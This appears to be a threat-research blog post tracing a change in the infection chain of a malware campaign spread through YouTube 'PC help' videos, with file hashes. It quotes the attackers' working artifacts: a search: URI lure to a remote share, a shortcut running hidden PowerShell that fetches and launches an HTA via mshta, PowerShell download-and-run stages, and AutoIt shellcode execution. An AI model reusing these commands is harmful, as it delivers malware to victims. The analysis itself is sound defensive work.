Ongoing series: #1 #2 #3 #4 #5 #6
another youtube pc help update
After YouTube finally suspended several reported channels and videos, the campaign continued without changes for a long time. Then, there was a complete restructuring of the initial infection chain.
Download Lure
Instead of a direct download, the redirection from https://geeksupp[.]com was rewritten, and now it leads to a minimal website with a unique feature in the <head> tag:
<head>
<meta http-equiv="refresh" content="0; URL=search:query=lnstruction_856.pdf&crumb=location:\\download.instructionclubs.com@80\Downloads\&displayname=Downloads">
<link rel="icon" href="favicon.ico" type="image/x-icon">
</head>
The file name (SHA256:44A85A2846384CDC8E0BEB23977268E2E617A4C67CD8F8B4864A989F7EA68C39) was changed shortly after the adjustment to Doc_8147.pdf, but the rest remained the same. This leads the visitor from the redirection to a browser notification, prompting them to open Windows Explorer. If the user allows this action, a search window will open, supposedly looking for the PDF file, and it appears to have been “found” in the Downloads folder. In reality, this is a remote share mounted by Windows Explorer. The file is actually a .lnk shortcut, but the .lnk extension is hidden from the user, displaying a PDF icon instead. Rather than opening a document as expected, the link is configured to download the next stage of the malware.
Executing the Shortcut (Stage 1)
Contrary to what the icon and name suggest, the shortcut does not point to a document but instead directs to the following path with corresponding parameters:
Icon=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Target=C:\Windows\System32\forfiles.exe
TargetArguments=/p C:\Windows\System32 /m cmmon32.exe /c "cmd /c powershell -w hidden -c \"iwr 'https://a3.bigdownloadtech.shop/webdav/reg/SHCORE' -o $env:TEMP\s.hta;start mshta $env:TEMP\s.hta\""
This shortcut and its arguments were also changed (SHA256:29C461188C5FE894D8A06DFDC6818FC286F434FFD7264B960949DEEAFFDD2C40) when the filename was updated.
TargetArguments=/p C:\Windows /m write.exe /c "powershell . \*i*\*2\msh*e https://a3.bigdownloadtech.shop/webdav/reg/BaristaBagging.json
However, the content of the downloaded file (SHA256:5436A830F3D34BF161B846DE94286967DDB63A0090B8AC59EA0CD3E066BF00BC) remained the same, despite the changed filename.
HTML in the Executable (Stage 2)
As before, the downloaded file is an executable; however, it is not launched as such through the mshta call. Instead, the embedded JavaScript code is executed. This script, like previous iterations, is multi-layered with several encoding and encryption stages, eventually leading to a PowerShell script. There are small changes compared to previous versions, such as downloading a PDF file with no significant content and overwriting the local version of the lure, likely to cover tracks.
$gkpr = "https://files.catbox.moe/gdtf9h.pdf"
$lxwn = "$env:TEMP\lnstruction_856.pdf"
$tfqy = ('I'+'nvoke'+'-Web'+'Request')
$rvnm = ('Start'+'-Process')
& $tfqy -Uri $gkpr -OutFile $lxwn
if (Test-Path $lxwn) {
& $rvnm $lxwn
}
Additionally, an obfuscated AutoIT script config.bin (SHA256:FB1EC9AD8AF7681B6F217BE1131C0DA1DCA8105A81F1AE02A098457C05BE570A) is downloaded, along with the corresponding (legitimate) executable update.bin to run it.
$mn3 = "Aac3572MbHal.exe"
$r5q = -join ((65..90) + (97..122) | ForEach-Object { [char]$_ } | Get-Random -Count 8) + ".a3x"
$kl9 = Join-Path -Path $env:TEMP -ChildPath (-join ((48..57 | ForEach-Object { [char]$_ }) | Get-Random -Count 8))
New-Item -Path $kl9 -ItemType Directory -Force | Out-Null
$n2b = Join-Path -Path $kl9 -ChildPath $mn3
$j6m = Join-Path -Path $kl9 -ChildPath $r5q
$d8r = "https://a3.bigdownloadtech.shop/webdav/reg/update.bin"
$y7f = "https://a3.bigdownloadtech.shop/webdav/reg/config.bin"
Invoke-WebRequest -Uri $d8r -OutFile $n2b -UseBasicParsing
Invoke-WebRequest -Uri $y7f -OutFile $j6m -UseBasicParsing
Start-Process -FilePath $n2b -ArgumentList $j6m -NoNewWindow -Wait
$null = $mn3, $r5q, $kl9, $n2b, $j6m, $d8r, $y7f
AutoIt Script (Stage 3)
The subsequent stages have not changed. After successfully deobfuscating and decrypting the AutoIT script, the familiar pattern becomes apparent once again. The script extracts shellcode (SHA256:2199F67610A2E3BB5C3E207C90C3ADF17299A6DCA23F1CFEBF80A021684A5D79) from the script file, which is then executed via callback. This leads to the final payload being downloaded and executed.
DllStructCreate("byte[174460]")
DllCall("kernel32.dll","BOOL","VirtualProtect","ptr",DllStructGetPtr($pt),"int",174460 ,"dword",0x40,"dword*",null)
DllStructSetData($pt,1,$data)
DllCall("user32.dll","int","EnumWindows","ptr",DllStructGetPtr($pt),"lparam",0)